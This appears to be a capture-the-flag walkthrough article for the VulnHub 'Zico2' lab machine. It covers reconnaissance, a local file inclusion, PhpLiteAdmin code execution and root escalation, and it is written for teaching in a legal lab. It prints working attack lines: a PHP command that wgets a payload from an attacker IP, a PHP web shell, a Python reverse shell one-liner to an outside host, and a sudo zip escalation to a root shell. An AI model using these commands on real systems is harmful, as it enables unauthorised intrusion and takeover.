Capture the flag (CTF)

Zico 2: 1 CTF Walkthrough

In this article, we will learn to solve another Capture the Flag (CTF) challenge posted on VulnHub by Rafael. As you may know from previous articles, Vulnhub.com is a platform that provides vulnerable applications/machines for practical, hands-on experience in conducting pen testing applications.

You can check previous articles for more related CTF challenges. The VM exploited in this article is named "Zico2" on the VulnHub website. The link to download the VM and run it in a VirtualBox is as follows:

https://download.vulnhub.com/zico/zico2.ova

The torrent download URL is also available for this VM, which is given in the reference section of this article. For those who are unaware of the site, VulnHub is a well-known security research website that provides users with a method to learn and practice their hacking skills through a series of challenges in a safe and legal environment.

The objective of this challenge is to gain root access and read the flag file. It is important to note that this VM will work only on VirtualBox.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

Step 1

To get started, the first step is always to find out what ports and services are available on the target machine. The Nmap full port scan is used for this specific purpose. This is illustrated in the screenshot below:

The above screenshot demonstrates that 3 ports are listed as OPEN by the Nmap scan.

Step 2

As port 80 is opened, so is also the IP on the web browser. From there, a website becomes available. You can see it in the following screenshot:

Next, I start looking for vulnerabilities in this application. While exploring, I found an interesting parameter that takes the HTML file as input and runs it onto the web browser. As a result, I started to look for the various vulnerabilities in this parameter and identified that it is now prone to Local File Inclusion (LFI). I extracted the password file from the target machine through this parameter. It can be seen in the screenshot below:

After analyzing the contents of this file, I could see that are some users on the target machine which have bash (shell) access. Because of this, I tried to log in as one of these users by using the various default passwords. However, this technique did not work.

Next, I decided to run the 'Dirb' tool to find any other entry points on the target system. The output of Dirb can be seen in the following screenshot.

Through the output of Dirb, more entry points were discovered. I started with dbadmin. I next opened up the "'/dbadmin/" directory on the web browser.

The file had a directory listing enabled and a test file in it. It was clicked on and opened the 'PhpLiteAdmin' login page on the web browser. To login into it, only one password was required. It can be seen in the following screenshot:

The file appears to be an outdated version. I tried the default password admin, and it was correct. I could successfully login into the database. To start the search for new exploits on Google, "phpliteadmin" was given as the search string. The first result on Google shows that this version is prone to a vulnerability to remote code execution. This is demonstrated in the screenshot below:

I read this on the exploit Db website. It appeared to be more like a process instead of an automated script. Next, I started following it step-by-step as it was given in the exploit. I then created a database with the extension of "php." It can be seen in the following screenshot:

As demonstrated in the above screenshot, the database created is titled the "hehe.php" database. The full path of the database can be seen in the same window.

As per the exploit process, I created a new table with one field and clicked on "Go."

After execution, the application was then redirected to another page. It asked me to enter the field name and a default value. So, I added "Any Name" in the first field and ensured that it was an integer type. The PHP code was entered as the default value. This process is demonstrated in the following screenshot:

Next, I clicked on "Create," and it created a database table with the given details, as illustrated below:

I have identified the Local File Inclusion (LFI) in the above steps in the application. Next, I created a file database named "php extension." This was included in the vulnerable parameter, as demonstrated below:

As can be seen in the above screenshot, the code was successfully executed on the target system. Also, we can see the "phpMyAdmin" page on the web browser. This means that whatever code was entered as the default value of the database table is correct, and thus, it will get executed by the target system. Next, a PHP code snippet was written which will run our commands onto the target system, as seen in the screenshot below:

<?php

system (" cd /tmp; wget 192.168.100.105/hehe;");

?>

This code was added as a table in the database, as can be seen below:

Before executing the code onto the web browser, it is important to understand how it works. First, it will change the current directory to a "/tmp/" directory. Second, it will then download the file from the host machine onto the target machine in the /tmp/ directory by using the "wget" utility. Third, a "php" shell code will then be added to the "hehe" file, as seen below:

<?php

system ($_GET['cmd']);

?>

This code was then executed, and the web browser output can be seen in the following screenshot:

As this does not create any output onto the web browser, it was assumed that the file would have been generated in the "/tmp/" directory. The "hehe" file was incorporated by using the file inclusion. Next, various commands were executed onto the target system, as can be seen below:

As can be seen in the screenshot above, the 'ls' command has been successfully executed. It means that we can run any commands onto the target machine. So, let us try to run a command that would give the target machine's command shell. This can be specified as follows:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.61",3434));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The above command gets the reverse connection onto the target machine.

The above screenshot demonstrates that we have successfully achieved a reverse connection from the target machine. After that, another command is then executed to get the stage shell onto the target system. This can be seen in the screenshot below:

Command Used: python -c'import pty; pty.spawn("/bin/sh")'

The first target has been completed, and as a result, the limited shell access on the target machine has been achieved. However, the CTF challenge was getting to the VM's root access.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

I further explored the VM for any other entry points to accomplish this task. While doing so, I discovered the database credentials in the WordPress configuration file, which can be seen in the below screenshot:

The database username and password can be seen in the area above, highlighted in red. I tried the same database password for the user named "ZICO." The output can be seen in the below screenshot:

As can be seen, I have successfully logged in as "ZICO." However, it is still not a root user on the system. So, I started exploring other entry points to discover the root access.

After some time, I found an error message that showed various commands that could be run onto the target machine as a root user without actually using the root password. This is illustrated in the following screenshot:

As seen in the above screenshot, two package commands can be run as a root user without the need for the actual root password. Thus, I created a small script that utilizes a "give package command." This gives the root access to the target system. It can be seen in the screenshot below:

Command Used:

sudo -u root /usr/bin/zip ttt.zip tt.php -T --unzip-command="sh -c /bin/bash"

Finally, we have achieved gaining root access to the target system. I then changed the current directory to the root directory and read the flag file, as demonstrated in the screenshot below:

So, we finally got the flag. This completes the challenge. Stay tuned for more challenges in future articles.

 

References

• https://www.vulnhub.com/entry/zico2-1,210/
• https://www.dropbox.com/s/dhidaehguuhyv9a/zico2.ova
• https://download.vulnhub.com/zico/zico2.ova
• https://download.vulnhub.com/zico/zico2.ova.torrent Torrent Download
• http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
• https://www.exploit-db.com/exploits/24044/